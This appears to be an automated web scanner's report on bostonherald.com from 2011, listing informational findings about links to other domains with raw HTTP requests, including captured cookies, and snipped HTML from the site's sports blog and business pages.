<p>He&#8217;s a pretty powerful athlete. <a href="http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/2">Recently, Business Week Magazine released a list of exactly how powerful</a>
...[SNIP]...
<p><a href="http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/6"><u>
...[SNIP]...
hat&#8217;s where this comes in. Want to see some of the Senior Bowl&#8217;s best pass-rushers battle some of its best offensive linemen? Cool. With my new-and-improved Flip camera, I got you covered. <a href="http://bcove.me/jq9h39r3"><u>
...[SNIP]...
<p><object id="flashObj" width="486" height="412" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0">
<param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="videoId=766823050001&#038;playerID=84359688001&#038;playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9&#038;domain=embed&#038;dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="486" height="412" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
</strong>, the director of football operations of Perennial Sports and Entertainment, <a href="http://twitter.com/#!/RapSheet/statuses/30752231791796225">said as much in a Tweet</a>
...[SNIP]...
<p><a href="http://sports.espn.go.com/ncf/player/profile?playerId=235808">Sanzenbacher shares several characteristics</a>
...[SNIP]...
gn="right" width="256" height="256" />Earlier today, the NFL offices hosted 10 reporters for a meeting breaking down various aspects of the impending labor disasterbacle. Alas, I wasn&#8217;t invited. <a href="http://profootballtalk.nbcsports.com/2011/01/27/nfl-stresses-immediate-consequences-of-possible-lockout/">But Pro Football Talk&#8217;s<strong>
...[SNIP]...
<p>The league, <a href="http://twitter.com/#!/greggrosenthal/statuses/30718247296835584">though people such as NFL chief negotiator <strong>
...[SNIP]...
e="RB senior bowl" alt="RB senior bowl" align="right" width="256" height="129" />Of all the holes the Patriots have looking toward 2011, the spot at running back is kind of undercover. They did have a <a href="http://www.google.com/url?sa=t&amp;source=web&amp;cd=1&amp;ved=0CBcQFjAA&amp;url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2011%2F01%2F14%2Fwhy-is-patriots-rb-benjarvus-green-ellis-always-so-positive-and-links%2F&amp;rct=j&amp;q=Rap%20Sheet%20Green-Ellis%20positive%20yards&amp;ei=vXxBTYS6NIPpgQfr08XMAQ&amp;usg=AFQjCNFs93srIrRIMWcjlJNqetsJyngKoA&amp;sig2=dpufrHU-q6YaX7UMvpfX-Q&amp;cad=rja">1,000-yard rusher in<strong>
...[SNIP]...
<font class=bodyFont color=#333333>
   <img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/rap_sheet.gif">
   <div style="position:absolute; top:25px; right:15px">
...[SNIP]...
<a href=http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/feed/><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssGrey11.gif" border=0>RSS Feed</a>
...[SNIP]...
<p>
   <img src="http://cache.heraldinteractive.com/images/siteImages/reporters/rapoport_50.jpg" style="float:left; padding:0 3px 5px 0">
Patriots beat reporter <b>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/karen_guregian.gif" style="float:left; padding:0 3px 5px 0">    
    <b>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/category/discovering-devin/"><img style="border: 1px #666 solid;" src="http://cache.heraldinteractive.com/images/version5.0/site_images/sports/discovering_devin/McCourty_310x100.jpg" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

17.265. http://www.bostonherald.com/business/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:08:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 89129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Ad: wallpaper takeover -->


   <link rel="alternate" title="Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Findex.bg&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1312531&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Wal-Mart seeks opening"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="http://bostonherald.com/business/general/view.bg?articleid=1312531&position=0">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="http://bostonherald.com/business/general/view.bg?articleid=1312531&position=0">
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1312519&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20110127/stp/fabb2e_fin_01282011.jpg" alt="LIVELY DISCUSSION: Panel members, from left, Olivier Blanchard, Robert Gordon and N. Gregory Mankiw talked about fiscal policy at an MIT panel discussion yesterday."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/business/general/view.bg?articleid=1312647&format=comments&srvc=business&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/business/technology/general/view.bg?articleid=1312544&format=comments&srvc=business&position=3">
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1312530&srvc=business&position=4"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/86c01a_table_01282011.jpg" alt="SPICING IT UP: Charlie Larner, left, and Michael Winter stand inside the soonto-
be Mija Cantina & Tequila Bar inside a renovated Sam&#x2019;s Cafe at Faneuil Hall
Marketplace.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/business/general/view.bg?articleid=1312530&format=comments&srvc=business&position=4">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/general/view/20110128bank_forecloses_on_mass_supplements_seller_goes/format=comments&srvc=business&position=also">
...[SNIP]...
<a href="/business/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/f8b94c_taco012811.jpg" alt="This a copy of an ad provided by Taco Bell. Taco Bell is launching an advertising campaign Friday, Jan. 28, 2011 to fight back against a lawsuit charging its taco filling isn&rsquo;t beef." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/format=comments&srvc=business&position=also">
...[SNIP]...
<a href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=business&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=business&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/format=comments&srvc=business&position=also">
...[SNIP]...
<h3><a href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Recent Headlines from AP</a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports"></script>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/the_ticker/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/ticker.gif" alt="The Ticker" />
           State hands out $24M in tax breaks to life sciences firms
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/working_stiff/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/workingStiff.gif" alt="Working Stiff" />
           Five dating tips for first-time job hunters
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/getting_real/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/getting_real.gif" alt="Getting Real" />
           Fed homebuyer tax credit may actually raise $
           </a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business" target="_new">All Business</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/automotive" target="_new">Automotive</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/general" target="_new">Business & Markets</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/healthcare" target="_new">Healthcare</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/media" target="_new">Media & marketing</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/real_estate" target="_new">Real Esate</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/technology" target="_new">Technology</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/technology/reviews" target="_new">Technology Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/womens" target="_new">Women's Business</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/jobfind/news/your_career" target="_new">Your Career - Jobfind</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<span class="bold" /><a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Quote:</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/HighLow.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">52 Week High/low</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&amp;idx=3&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Index Performance</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Market Movers</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/FundRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/etfreturns/ETFReturns.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a>
...[SNIP]...
<td class="t4" align="left" height="15" colspan="5"><a href="http://www.bankrate.com/finance/mortgages/bankrate-com-averages.aspx?pid=p:bhn" class="head-link">Overnight
Averages</a>
...[SNIP]...
<td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/mortgages/?pid=p:bhn&amp;prods=1" class="sidebar-link">30 yr fixed mtg</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=1&amp;prodtype=M&amp;thisponsor=cf1&amp;ad=mtg&amp;nav=mtg30year_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/home-equity/?pid=p:bhn&amp;prods=50" class="sidebar-link">$30K HELOC</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=50&amp;prodtype=L&amp;ad=loan&amp;nav=heloc30k_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_ball.gif" width="11" height="1" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/auto/?pid=p:bhn&amp;prods=39" class="sidebar-link">48 month new car loan</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=39&amp;prodtype=A&amp;ad=auto&amp;nav=48mo_newcar_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_dn_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/cd-investments/?pid=p:bhn&amp;prods=15&amp;local=true" class="sidebar-link">1 yr CD</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=15&amp;prodtype=D&amp;ad=dep&amp;nav=1yearcd_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif" width="11" height="6" vspace="4" /></td>
...[SNIP]...
<!-- // NDN Widget // -->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.266. http://www.bostonherald.com/business/general/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business/general/?srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Business &amp; Markets - Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/general/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fgeneral%2F%3Fposition%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=biz&position=">
...[SNIP]...
